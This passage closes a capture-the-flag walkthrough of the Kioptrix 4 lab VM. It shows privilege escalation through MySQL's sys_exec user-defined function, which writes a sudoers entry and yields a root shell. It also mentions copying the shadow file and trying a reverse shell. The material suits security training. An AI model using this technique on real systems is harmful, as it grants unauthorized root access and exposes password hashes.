+-----------------------+-----+---------------------+----------+
| sys_get               |   0 | lib_mysqludf_sys.so | function |
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| sys_set               |   2 | lib_mysqludf_sys.so | function |
| sys_exec              |   2 | lib_mysqludf_sys.so | function |
| sys_eval              |   0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
5 rows in set (0.00 sec)

I tried to open a reverse shell, but it didn't work out, so finally I just updated the sudoers file by adding robert, and that worked. I also copied the shadow and sudoers files to my home directory, which I don't show here.

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers");
+--------------------------------------------------------+
| sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers") |
+--------------------------------------------------------+
|                                                      0 |
+--------------------------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
robert@Kioptrix4:~$ sudo bash
[sudo] password for robert:
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:~# ls /root/
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat /root/congrats.txt
Congratulations!
You've got root.
(...)



Other ways:

I also found that you can run sqlmap against the webapp to perform the SQL injection, but that wasn't the way I did it.

-----

I really enjoyed going through all levels, thanks to the developers of these VMs.